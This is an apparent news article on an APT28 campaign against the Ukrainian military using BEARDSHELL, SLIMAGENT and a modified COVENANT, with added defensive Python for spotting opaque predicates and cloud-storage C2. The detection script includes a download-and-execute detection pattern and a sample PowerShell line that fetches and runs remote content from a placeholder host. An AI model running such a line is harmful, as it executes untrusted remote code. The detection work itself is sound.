APT28 Targets Ukrainian Military with BEARDSHELL and COVENANT Malware
Russian state-linked hackers continue evolving their cyber-espionage toolkit using cloud-based command-and-control and stealth implants.

The Russian state-sponsored threat group widely known as APT28 has launched a sophisticated cyber-espionage campaign targeting Ukrainian military personnel using two advanced malware tools known as BEARDSHELL and COVENANT. Security researchers revealed that the operation has been active since April 2024, highlighting the continued role of cyber warfare in geopolitical conflicts.
APT28, often associated with Russia’s military intelligence unit GRU Unit 26165, has operated for over a decade under multiple aliases including Fancy Bear, Sofacy, and Sednit. The group frequently targets government institutions, defense organizations, and critical infrastructure worldwide. However, the latest campaign shows a renewed focus on long-term surveillance and intelligence gathering within Ukraine’s defense ecosystem.
Multi-Layered Malware Toolkit
The attackers rely on a combination of implants to maintain persistence and gather intelligence from compromised systems.
One of the core tools in the campaign is SLIMAGENT, a surveillance implant capable of logging keystrokes, capturing screenshots, and collecting clipboard data. The malware generates detailed activity logs in HTML format, allowing operators to review user behavior and sensitive information collected from infected systems.
Interestingly, SLIMAGENT shares code similarities with XAgent, an earlier espionage malware used by APT28 during operations in the 2010s. This connection suggests that the threat actor continues to evolve its existing malware families rather than building entirely new frameworks. As a result, defenders may face challenges detecting variants that inherit legacy code but introduce new obfuscation methods.
BEARDSHELL Backdoor and Cloud-Based C2
Another key component of the operation is BEARDSHELL, a backdoor designed to execute PowerShell commands on compromised machines. This tool allows attackers to maintain remote control over infected systems while quietly collecting intelligence.
What makes BEARDSHELL particularly notable is its command-and-control strategy. Instead of relying on traditional malicious infrastructure, the malware communicates with operators through the legitimate cloud storage service Icedrive. By blending malicious traffic with legitimate cloud activity, the attackers significantly reduce the chances of detection by security monitoring systems.
Additionally, researchers identified a rare obfuscation technique called opaque predicates within BEARDSHELL. This technique complicates malware analysis and has previously appeared in XTunnel, another tool used by APT28 in past high-profile cyber operations.
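An opaque predicate is a branch condition whose outcome the author knows in advance (it is always true or always false) but which looks like a genuine decision to a disassembler or a human reader; the dead branch is then filled with junk that inflates the analysis effort. The following Python script is an added illustration, not code from the article or from any APT28 sample: it defines two textbook opaque predicates, a real predicate for contrast, and a simple analyst-side check that evaluates a predicate over many random and corner-case inputs to flag conditions that never vary. All function names and the sampling parameters are assumptions of this example.

```python
"""Recognising opaque predicates by evaluation.

Added example, not part of the original article. The predicates below are
textbook constructions, not code recovered from any real implant.
"""
import random


def opaque_always_true(x, y):
    # 7*y*y - 1 == x*x has no integer solutions: x*x mod 7 can only be
    # 0, 1, 2 or 4, never 6, so the inequality holds for every (x, y).
    return 7 * y * y - 1 != x * x


def opaque_always_true_2(x, y):
    # x*(x + 1) is the product of two consecutive integers, hence always even.
    return (x * x + x) % 2 == 0


def opaque_always_false(x, y):
    # Negation of an always-true predicate: the guarded branch never runs.
    return (x * x + x) % 2 == 1


def real_predicate(x, y):
    # A genuine condition: its outcome depends on the inputs.
    return x > y


CORNER_CASES = [-2**31, -2, -1, 0, 1, 2, 2**31 - 1]


def classify_predicate(pred, trials=20000, seed=1, bits=32):
    """Return 'always-true', 'always-false' or 'varies'.

    Sampling cannot prove constancy; it only reports that no counterexample
    was found among the corner cases and `trials` random signed `bits`-bit
    pairs. A branch whose condition never varies is a candidate for folding
    (the unreachable side is junk) and worth confirming with a solver.
    """
    rng = random.Random(seed)
    seen = set()
    inputs = [(x, y) for x in CORNER_CASES for y in CORNER_CASES]
    half = 1 << (bits - 1)
    for _ in range(trials):
        inputs.append((rng.getrandbits(bits) - half, rng.getrandbits(bits) - half))
    for x, y in inputs:
        seen.add(bool(pred(x, y)))
        if len(seen) == 2:
            return "varies"
    return "always-true" if True in seen else "always-false"


def classify_all():
    """Classify the four sample predicates; returns a name -> verdict map."""
    return {
        f.__name__: classify_predicate(f)
        for f in (opaque_always_true, opaque_always_true_2,
                  opaque_always_false, real_predicate)
    }


if __name__ == "__main__":
    for name, verdict in classify_all().items():
        print(f"{name:24s} {verdict}")
```

In practice the same idea is applied to conditions lifted from disassembly: a condition that evaluates identically across a large input space is treated as a candidate opaque predicate, the dead branch is marked unreachable, and the control-flow graph is simplified before further analysis. The sampling check only raises suspicion; a symbolic or SMT-based check is needed to confirm that no input flips the branch.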
Modified COVENANT Framework
The threat group also uses a heavily customized version of COVENANT, an open-source .NET post-exploitation framework originally developed for red-team operations. Although official development of the tool stopped in 2021, APT28 has continued to adapt and extend it for espionage purposes.
In the current campaign, the modified framework communicates through the Filen cloud storage service, creating another stealthy command channel. Previous campaigns reportedly used other cloud providers, demonstrating how the group continuously rotates infrastructure to evade detection.
These modifications show that the attackers possess deep technical expertise and long-term operational planning. By adapting publicly available tools and combining them with custom malware, they maintain a powerful and flexible cyber-espionage capability.
Strategic Implications
The campaign reflects a broader shift in advanced persistent threat operations. Rather than relying solely on bespoke malware, attackers increasingly blend open-source frameworks with custom implants and cloud services. This approach lowers operational costs while improving stealth.
For defense organizations and governments, the threat remains significant. Persistent espionage campaigns like this aim to gather intelligence on military strategies, operational planning, and defense infrastructure. Therefore, organizations must strengthen endpoint monitoring, restrict unauthorized cloud communications, and maintain visibility into PowerShell activity across networks.
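The two stealth channels described earlier (BEARDSHELL over Icedrive and the modified COVENANT over Filen) and the three recommendations above share one detection idea: cloud-storage traffic is normal for browsers and an approved sync client, but not for PowerShell or other unexpected processes, and PowerShell script blocks that fetch content from such services and execute it deserve an alert. The Python script below is an added example, not code from the article or from any vendor product. It runs three checks over constructed endpoint telemetry: an unsanctioned-process check on network connections, a content check on Event ID 4104-style script-block records, and a simple periodicity check that surfaces beacon-like regularity. The hostnames in the watch list are placeholders (the article names the services but not their API hosts); the process allowlist, field names and thresholds are assumptions to be tuned per environment.

```python
"""Detecting cloud-storage C2 and PowerShell download-and-execute.

Added example, not part of the original article. Telemetry below is
constructed; hostnames are placeholders to be replaced with the real API
hosts of the cloud services you choose to watch.
"""
import re
from collections import defaultdict
from statistics import mean, pstdev

# Placeholder watch list of cloud-storage hosts (constructed, not real IoCs).
CLOUD_STORAGE_HOSTS = ("icedrive.example", "filen.example", "cloudstore.example")

# Processes permitted to talk to cloud storage (assumed environment policy).
ALLOWED_CLOUD_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "approved-sync.exe"}

# Script-block pattern: web download whose result reaches Invoke-Expression.
DOWNLOAD_EXEC = re.compile(
    r"(Invoke-WebRequest|DownloadString|Net\.WebClient).*?(Invoke-Expression|\bIEX\b)",
    re.IGNORECASE | re.DOTALL,
)


def is_cloud_storage(host):
    """True if host is, or is a subdomain of, a watched cloud-storage host."""
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in CLOUD_STORAGE_HOSTS)


def check_connection(ev):
    """ev: {'ts': seconds, 'process': str, 'host': str}. Alert text or None."""
    if is_cloud_storage(ev["host"]) and ev["process"].lower() not in ALLOWED_CLOUD_PROCESSES:
        return f"unsanctioned cloud-storage connection: {ev['process']} -> {ev['host']}"
    return None


def check_script_block(ev):
    """ev: {'ts': seconds, 'process': str, 'script': str} (4104-style record)."""
    findings = []
    text = ev["script"].lower()
    for h in CLOUD_STORAGE_HOSTS:
        if h in text:
            findings.append(f"script block references cloud-storage host {h}")
    if DOWNLOAD_EXEC.search(ev["script"]):
        findings.append("script block downloads content and feeds it to Invoke-Expression")
    return findings


def find_beacons(conns, min_count=4, max_jitter=0.2):
    """Flag (process, host) pairs with at least min_count connections to a
    watched host at near-regular intervals (relative std-dev <= max_jitter)."""
    groups = defaultdict(list)
    for ev in conns:
        groups[(ev["process"], ev["host"])].append(ev["ts"])
    alerts = []
    for (proc, host), stamps in groups.items():
        if len(stamps) < min_count or not is_cloud_storage(host):
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            alerts.append(f"periodic cloud-storage traffic from {proc} to {host} every ~{avg:.0f}s")
    return alerts


def analyze(connections, script_blocks):
    """Run all checks; connection alerts are deduplicated per (process, host)."""
    alerts = list(dict.fromkeys(a for a in map(check_connection, connections) if a))
    for sb in script_blocks:
        alerts.extend(check_script_block(sb))
    alerts.extend(find_beacons(connections))
    return alerts


# Constructed sample telemetry: a browser session, a PowerShell process polling
# a storage host roughly every minute, and a script block that downloads and
# executes content from another storage host.
SAMPLE_CONNECTIONS = [
    {"ts": 0, "process": "chrome.exe", "host": "icedrive.example"},
    {"ts": 10, "process": "powershell.exe", "host": "api.icedrive.example"},
    {"ts": 70, "process": "powershell.exe", "host": "api.icedrive.example"},
    {"ts": 131, "process": "powershell.exe", "host": "api.icedrive.example"},
    {"ts": 190, "process": "powershell.exe", "host": "api.icedrive.example"},
    {"ts": 200, "process": "outlook.exe", "host": "mail.example.com"},
]
SAMPLE_SCRIPT_BLOCKS = [
    {"ts": 5, "process": "powershell.exe", "script": "Get-ChildItem C:\\Users"},
    {"ts": 12, "process": "powershell.exe",
     "script": "$r = Invoke-WebRequest https://api.filen.example/v1/file; Invoke-Expression $r.Content"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_CONNECTIONS, SAMPLE_SCRIPT_BLOCKS):
        print("ALERT:", alert)
```

On the sample data this raises four alerts: one unsanctioned connection (PowerShell to the storage host), two script-block findings (a watched host reference and a download-then-execute chain), and one beaconing alert for the roughly 60-second polling pattern. The script-block check presupposes that PowerShell Script Block Logging is enabled, which is the concrete form of the "visibility into PowerShell activity" recommendation; the connection check presupposes that process-to-connection attribution is available from the endpoint agent or proxy.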
As geopolitical tensions continue to influence cyber operations, campaigns like this demonstrate how cyber espionage remains a critical component of modern conflict.